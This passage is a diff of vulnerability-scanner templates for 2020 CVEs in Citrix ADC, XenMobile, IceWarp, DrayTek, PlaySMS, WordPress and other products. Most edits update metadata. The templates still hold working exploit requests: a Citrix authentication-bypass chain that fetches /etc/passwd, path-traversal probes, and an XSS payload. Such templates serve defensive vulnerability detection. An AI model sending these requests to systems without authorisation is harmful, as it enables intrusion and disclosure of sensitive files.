matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + + - type: word + part: header + words: + - "text/html" - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 9e01b08c63..72772deb55 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -14,11 +14,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2020-8193 - cwe-id: CWE-862 - epss-score: 0.97456 - tags: cve,cve2020,citrix,lfi,kev,packetstorm + cwe-id: CWE-287,CWE-284 + epss-score: 0.97455 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix,lfi,kev,packetstorm http: - raw: @@ -30,19 +33,15 @@ http: X-NITRO-PASS: xWXHUJ56 - - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} @@ -52,7 +51,6 @@ http: rand_key: {{randkey}} - - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} @@ -64,16 +62,16 @@ http: cookie-reuse: true + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + extractors: - type: regex name: randkey # dynamic variable - part: body - internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" + internal: true part: body diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 1f9dc1c17d..7371960f70 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -4,7 +4,6 @@ info: name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection author: dwisiswant0 severity: medium - description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. reference: - https://support.citrix.com/article/CTX276688 @@ -14,10 +13,13 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8194 cwe-id: CWE-94 - epss-score: 0.97231 - tags: cve,cve2020,citrix + epss-score: 0.97325 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix http: - raw: @@ -29,14 +31,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "application/x-java-jnlp-file" - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 18c64c901d..10d054518e 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -17,11 +17,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-8209 cwe-id: CWE-22 + epss-score: 0.97223 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* - epss-score: 0.97245 - tags: cve,cve2020,citrix,lfi,xenmobile metadata: max-request: 1 + vendor: citrix + product: xenmobile_server + tags: cve,cve2020,citrix,lfi,xenmobile http: - method: GET @@ -30,11 +32,6 @@ http: matchers-condition: and matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: word part: header words: @@ -42,3 +39,8 @@ http: - "application/octet-stream" - "attachment;" condition: and + + - type: regex + part: body + regex: + - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index 6dccdbd2c6..a7d9fe9be5 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -13,11 +13,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-8497 cwe-id: CWE-306 - cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* epss-score: 0.002 - tags: cve,cve2020,fms,artica + cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: artica + product: pandora_fms + tags: cve,cve2020,fms,artica http: - method: GET diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 5e6086035c..50114ba1ca 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -16,27 +16,32 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8512 cwe-id: CWE-79 - cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* epss-score: 0.0046 + cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"icewarp" + vendor: icewarp + product: icewarp_server tags: edb,packetstorm,cve,cve2020,xss,icewarp http: - method: GET path: - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22' + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 1f38556652..b210dcc95d 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -17,9 +17,12 @@ info: cve-id: CVE-2020-8515 cwe-id: CWE-78 epss-score: 0.97183 - tags: cve,cve2020,rce,kev + cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 + vendor: draytek + product: vigor2960_firmware + tags: cve,cve2020,rce,kev http: - raw: @@ -32,9 +35,9 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index dcc3f8376c..700abb019a 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -14,11 +14,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8641 cwe-id: CWE-22 - cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:*:*:*:*:*:*:*:* - epss-score: 0.00796 - tags: cve2020,lfi,lotus,cms,edb,cve + epss-score: 0.00709 + cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lotus_core_cms_project + product: lotus_core_cms + tags: cve2020,lfi,lotus,cms,edb,cve http: - method: GET @@ -27,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 5a8a0d4d9b..900d1f3a5a 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -10,15 +10,18 @@ info: - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html + - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8644 - cwe-id: CWE-74 + cwe-id: CWE-94 + epss-score: 0.95246 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* - epss-score: 0.94485 metadata: max-request: 2 + vendor: playsms + product: playsms tags: unauth,kev,packetstorm,cve,cve2020,ssti,playsms,rce http: @@ -27,7 +30,6 @@ http: GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 Host: {{Hostname}} @@ -39,18 +41,9 @@ http: cookie-reuse: true host-redirects: true max-redirects: 2 - extractors: - - type: xpath - name: csrf - part: body - attribute: value - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input matchers-condition: and matchers: - - type: word part: body words: @@ -59,3 +52,12 @@ http: - type: status status: - 200 + + extractors: + - type: xpath + name: csrf + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input + attribute: value + part: body diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index bf40ef7307..a5b3338a31 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -15,26 +15,19 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:*:*:*:*:*:*:*:* - epss-score: 0.05217 - tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 + epss-score: 0.06956 + cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: eyesofnetwork + product: eyesofnetwork + tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 http: - method: GET path: - "{{BaseURL}}/css/eonweb.css" - extractors: - - type: regex - name: version - internal: true - part: body - group: 1 - regex: - - '# VERSION : ([0-9.]+)' - matchers-condition: and matchers: - type: dsl @@ -49,3 +42,12 @@ http: - type: status status: - 200 + + extractors: + - type: regex + name: version + group: 1 + regex: + - "# VERSION : ([0-9.]+)" + internal: true + part: body diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index b4c28e2dc9..d6d6fcf5e7 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -15,11 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8771 cwe-id: CWE-287 - cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:*:*:* - epss-score: 0.0673 - tags: cve,cve2020,wordpress,wp-plugin + epss-score: 0.06142 + cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: wptimecapsule + product: wp_time_capsule + tags: cve,cve2020,wordpress,wp-plugin http: - raw: @@ -30,7 +33,6 @@ http: Accept: */* IWP_JSON_PREFIX - - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} @@ -38,19 +40,20 @@ http: Accept: */* cookie-reuse: true + matchers-condition: and matchers: - type: word + part: body words: - '